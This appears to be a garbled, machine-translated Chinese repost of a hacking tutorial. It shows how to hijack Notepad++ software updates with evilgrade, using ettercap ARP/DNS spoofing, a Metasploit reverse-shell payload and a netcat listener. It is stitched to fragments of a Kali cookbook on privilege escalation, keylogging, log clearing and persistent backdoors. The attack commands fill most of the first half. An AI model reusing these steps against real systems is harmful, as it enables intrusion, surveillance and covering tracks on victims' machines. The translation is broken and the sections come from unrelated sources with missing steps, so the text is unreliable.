利用”值得信赖”的软件更新
我们都看见这条消息 — —现在有可用的软件更新!无一例外,我们相信此消息并下载的更新,大概是使我们更好地工作、 添加新功能,或使我们的系统更安全的系统。
如果,相反,当我们要提示下载更新,我们的系统会给出一个恶意的黑客控制安装恶意软件?这是我们要对我们的受害者在这里做什么 !
不同于其他黑客攻击,这是一个独立的,正是这样的 *** 作系统、 端口等。在这里我们将滥用用户信任,没有一个 *** 作系统或应用程序。
这将是我们为 Null Byte, 做过的最复杂黑客之一,所以如果你是新来的黑客,你可能想回来后做点工作背景。这次破解也利用了我们做在早些时候教程使用中间人攻击,所以您可能想要先读一下。
第 1 步: 安装 NotePad + +
在这次破解,我们将使用Notepad + +作为我们的示例软件,我们将劫持其更新,所以您将需要将它安装在一个系统上。在我的示例中,我下载了它到 Windows 7 的系统。
您可以下载最新版本的 Notepad + +.
第 2 步: 下载和安装 EvilGrade
下一步,我们会安装<a href="http://www.microsofttranslator.com/bv.%3Ca%20href=" http:="" www.2cto.com="" kf="" web="" asp="" "="" target="_blank" class="keylink" style="color: rgb(51, 51, 51)text-decoration: none">aspx?from=&to=zh-CHS&a=http%3A%2F%2Fwww.infobytesec.com%2F" target="_top">Infobytesec evilgrade,它被设计成一个模块化的框架,使攻击者可以通过注射”evil”更新到不知道用户的更新。我们可以下载从 GitHub evilgrade.
现在被称为evilgrade目录。
•mkdir -p /root/evilgrade
现在更改目录。
•cd /root/evilgrade
下一步我们解压并安装 evilgrade。
•tar -xvf isr-evilgrade-2.0.0.tar.gz
第 3 步: 运行 Evilgrade
下一步我们需要运行 evilgrade。我们键入:
•./ evilgrade
我们现在使用它从它自己的提示符运行于 evilgrade 交互式模式
•evilgrade >
第 4 步: 列出模块
现在,运行的 evilgrade,让我们看看这些evilgrade 已建的模块。在这里,代表evilgrade模块设计劫持其更新/升级过程的软件。在这个技巧,当然,我们会劫持Notepad++升级。
正如你可以看到下面,evilgrade有许多其它的软件模块,但它远覆盖所有的软件更新/升级。
•show modules
关键是要找到受害者是使用什么程序,也是evilgrade的模块和目标应用程序列表。
第 5 步: 配置Notepad
接下来,我们需要告诉我们想要劫持其升级的过程是什么的软件的 evilgrade。让我们告诉 evilgrade 我们想要劫持notepadplus.
•evilgrade>configure notepadplus
第 6 步: 查看 Notepad + + 模块需要什么参数
我们的下一步就是看哪些参数是evilgrade notepadplus模块需要的功能。我们用类似下面的命令检查这个Metasploit键入:
•show options
我们可以在上面的截图中看到此模块,需要我们到 Notepad + + 的软件和更新,即 sourceforge.net 源点。此外,我们需要设置代理,将是我们想要在受害人在预期更新位置上安装的恶意负载。
第 7 步: 生成一个Metsploit有效载荷
在,我们已经设置evilgrade了,我们需要开发一个恶意的有效载荷交付给升级软件,而不是实际的升级。我们可以用Metasploit的做到这一点。
如果您按照我的Metasploit的其他教程,你知道,我们可以选择一些不同的有效载荷使用Metasploit的(有效载荷是什么,我们加载到受害系统给我们控制)。在这种情况下,我们将使用其中一个最基本的有效载荷,在reverse tcp shell.。
我们可以产生一个有效载荷而不使用以下命令打开Metasploit的。此命令需要从Metasploit的框架,并将其装入一个利用一个叫做notepadplus_update.exe文件。
•/pentest/exploits/framework/modules/payloads/windows
• shell_reverse_tcp LHOST 192.168.1.104
•>/root/evilgrade/notepadplus_update.exe
请注意,如果您使用的是不同版本的Backtrack或kali,这些有效载荷模块在不同的目录。
第8步:启动Evilgrade
接下来,我们必须启动evilgrade 服务器。这是以一个简单的初始命令。
•evilgrade>start
第 9 步:添加Notepad++更新服务器作为域
我们的下一步是添加Notepad++我们要劫持域名。我们可以通过添加一个进入ettercap的etter.dns欺骗模块。这使我们能够欺骗受害者的软件更新源域名。
由于Notepad++是由SourceForge,我们添加下面一行的etter.dns文件结束。
•notepad-plus.sourceforge.net A 192.168.1.104
当然,你使用的IP地址应该是你想要更新过程来寻找你的邪恶更新IP地址。
第 10 步:配置iptables
iptables是Linux或UNIX内置防火墙/路由器。我们可以使用这个功能,路由的流量通过我们的系统在一个中间人攻击。让我们在您最喜爱的文本编辑器中打开etter.conf文件。
kwrite /etc/etter.conf
如图所见,通过文件当你滚动约三分之二,有一个条目,我已在 iptables 上突出显示。简单地取消注释 (删除 #) 到第二个和第三行,以便使用 iptables。
第 11 步: 开始 Ettercap
我们现在可以用下面的命令启动 ettercap。
•ettercap-Tqi eth0-P dns_spoof-M arp 192.168.1.114 192.168.1.104
条件:
•-T 指定终端接口
•-q 使用安静模式
•-i eth0说,我们想要使用eth0作为我们的接口
• -P dns_spoof选定,我们想要使用 dns欺骗 plug in_
•-M arp说,我们想要使用 arp 中间人攻击上之间两个 IP addresses_
第 12 步: 开启 Netcat 监听器
现在我们需要从我们的攻击机器启动netcat 侦听器。我们需要监听的evilgrade应用程序定义的端口,在这种情况下,Notepad + + 的端口为1234。
•nc-l-p 1234
第 13 步: 打开 Notepad + +
现在,让我们在受害者计算机打开 Notepad + + 。
第 14 步: 验证 DNS 欺骗
需要你打开 Notepad + +,如果此更新不会激发,我们需要检查 DNS 欺骗。
Evilgrade 是用于劫持软件更新的强大工具。通过播放一次攻击的人在中,我们可以攻击任何 *** 作系统更新的软件。我们这里有的唯一限制是模块的 evilgrade 来劫持其更新。
我们已经获得了想要攻击的计算机的权限。于是将权限尽可能提升就非常重要。通常,我们能访问较低权限的用户账户(计算机用户),但是,我们的目标账户可能是管理员账户。这一章中我们会探索几种提升权限的方式。
这个秘籍中,我们会通过使用模拟令牌,模拟网络上的另一个用户。令牌包含用于登录会话和识别用户、用户组合用户权限的安全信息。当用户登入 Windows 系统是,它们会得到一个访问令牌,作为授权会话的一部分。令牌模拟允许我们通过模拟指定用户来提升自己的权限。例如,系统账户可能需要以管理员身份运行来处理特定的任务。并且他通常会在结束后让渡提升的权限。我们会使用这个弱点来提升我们的访问权限。
为了执行这个秘籍,我们需要:
我们从 Meterpreter 开始探索模拟令牌。你需要使用 Metasploit 来攻击主机,以便获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得访问权限。
下面是具体步骤:
这个秘籍中,我们以具有漏洞的主机开始,之后使用 Meterpreter 在这台主机上模拟另一个用户的令牌。模拟攻击的目的是尽可能选择最高等级的用户,最好是同样跨域连接的某个人,并且使用它们的账户来深入挖掘该网络。
这个秘籍中,我们会在一台具有漏洞的主机上进行提权。本地提权允许我们访问系统或域的用户账户,从而利用我们所连接的当前系统。
为了执行这个秘籍,我们需要:
让我们在 Meterpreter shell 中开始执行本地提权攻击。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得主机的访问。
这个秘籍中,我们使用了 Meterpreter 对受害者的主机进行本地提权攻击。我们从 Meterpreter 中开始这个秘籍。之后我们执行了 getsystem 命令,它允许 Meterpreter 尝试在系统中提升我们的证书。如果成功了,我们就有了受害者主机上的系统级访问权限。
这个秘籍中,我们会探索社会工程工具包(SET)。SET 是个包含一些工具的框架,让你能够通过骗术来攻击受害者。SET 由 David Kennedy 设计。这个工具很快就成为了渗透测试者工具库中的标准。
掌握 SET 的步骤如下所示。
这个秘籍中,我们探索了 SET 的用法。SET 拥有菜单风格的接口,使它易于生成用于欺骗受害者的工具。我们以初始化 SET 开始,之后,SET 为我们提供了几种攻击方式。一旦我们选择了它,SET 会跟 Metasploit 交互,同时询问用户一系列问题。在这个秘籍的最后,我们创建了可执行文件,它会提供给我们目标主机的 Meterpreter 活动会话。
作为替代,你可以从桌面上启动 SET,访问 Applications | Kali Linux | Exploitation Tools | Social Engineering Tools | Social Engineering Toolkit | Set 。
将你的载荷传给受害者
下面的步骤会将你的载荷传给受害者。
这个秘籍中,我们会探索如何使用 Metasploit 来收集受害者的数据。有几种方式来完成这个任务,但是我们会探索在目标机器上记录用户击键顺序的方式。收集受害者数据可以让我们获得潜在的额外信息,我们可以将其用于进一步的攻击中。对于我们的例子,我们会收集目标主机上用户输入的击键顺序。
为了执行这个秘籍,我们需要:
让我们开始通过 Meterpreter shell 来收集受害者数据。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。
这个秘籍中,我们使用 Meterpreter 收集了受害者的数据。
有一种不同的方式,你可以使用它们来收集受害者机器上的数据。这个秘籍中,我们使用了 Metasploit 和 Metasploit keyscan 来记录击键顺序,但是我们也可以使用 Wireshark 或 airodump-ng 来更简单地收集数据。
这里的关键是探索其它工具,便于你找到最喜欢的工具来完成你的目标。
这个秘籍中,我们会使用 Metasploit 来清除我们的踪迹。在黑进主机之后执行清理是个非常重要的步骤,因为你不想在经历所有麻烦来获得访问权限之后还被人查水表。幸运的是,Metasploit 拥有一种方式来非常简单地清除我们的踪迹。
为了执行这个秘籍,我们需要:
需要执行步骤如下所示:
这个秘籍中,我们使用 Meterpreter 来清理我们在目标主机上的踪迹。我们从 Meterpreter 中开始这个秘籍,并启动了 IRB(一个 Ruby 解释器 shell)。下面,我们指定了想要清理的文件,并且最后键入了 Log.clear 命令来清理日志。要记住,一旦我们黑进了某个主机,你需要在最后执行这一步。你不能在清理踪迹之后再执行更多的 *** 作,这样只会更加更多的日志条目。
这个秘籍中,我们会使用 Metasploit persistence 来创建永久后门。一旦你成功获得了目标机器的访问权限,你需要探索重新获得机器访问权的方式,而不需要再次黑进它。如果目标机器的用户做了一些事情来终端连接,比如重启机器,后门的作用就是允许重新建立到你机器的连接。这就是创建后门非常方便的原因,它可以让你控制目标机器的访问。
为了执行这个秘籍,我们需要:
让我们开始植入我们的永久后门。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。
这个秘籍中,我们使用 Meterpreter 来建立永久后门。我们在黑进目标主机并获得 Meterpreter shell 之后开始了这个秘籍。之后我们通过浏览帮助文档那个,探索了一些可用的永久化方式。最后,我们通过运行安装命令并设置它的选项来完成后门的安装。
这个秘籍中,我们会对目标进行中间人(MITM)攻击。MITM攻击允许我们窃听目标和别人的通信。在我们的例子中,当某个 Windows 主机在 http://www.yahoo.com 收发邮件时,我们使用 Ettercap 来窃听它的通信。
为了执行这个秘籍,我们需要:
让我们启动 Ettercap 来开始中间人攻击。
这个秘籍包括 MITM 攻击,它通过 ARP 包毒化来窃听由用户传输的无线通信。
你直接说你用的bt5得了,绕一圈还linux内核系统弄得哥们一愣一愣,好像你能把win核换lin核一样,安装拜托你读下readme好不,内有教程,基本上你执行./install就行,注意大小写,与文件夹内一致欢迎分享,转载请注明来源:内存溢出
评论列表(0条)